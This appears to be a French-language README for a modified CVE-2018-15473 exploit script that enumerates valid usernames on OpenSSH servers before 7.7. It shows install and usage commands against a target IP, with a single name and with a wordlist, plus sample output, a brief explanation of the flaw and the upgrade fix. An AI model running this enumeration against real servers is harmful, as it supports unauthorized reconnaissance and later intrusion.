
OpenSSH 2.3 < 7.7 - Énumération de noms d'utilisateur
SSH-Username-Enumeration-Exploit (OpenSSH 2.3 < 7.7)
Version modifiée de l'exploit original : https://www.exploit-db.com/exploits/45233
#Ensure that you install the requirements:
foo@bar:~$ pip3 install -r requirements.txt
#For single username:
foo@bar:~$ ./CVE-2018-15473.py 192.168.1.20 -u root
[+] root is a valid username
#For multiple username:
foo@bar:~$ ./CVE-2018-15473.py 192.168.1.20 -w username_wordlist.txt
[+] root is a valid username
[-] mysql is an invalid username
[-] mike is an invalid username
[-] foo is an invalid username
[-] bar is an invalid username
Valid Users:
root
#For more option:
foo@bar:~$ ./CVE-2018-15473.py -h
Le système répond différemment aux tentatives d'authentification valides et invalides. Un utilisateur distant peut envoyer des requêtes spécialement conçues pour déterminer les noms d'utilisateurs valides sur le système cible. Ainsi, un utilisateur distant peut déterminer les noms d'utilisateurs valides sur le système cible.
Le serveur OpenSSH doit être mis à niveau vers la version 7.7 ou ultérieure.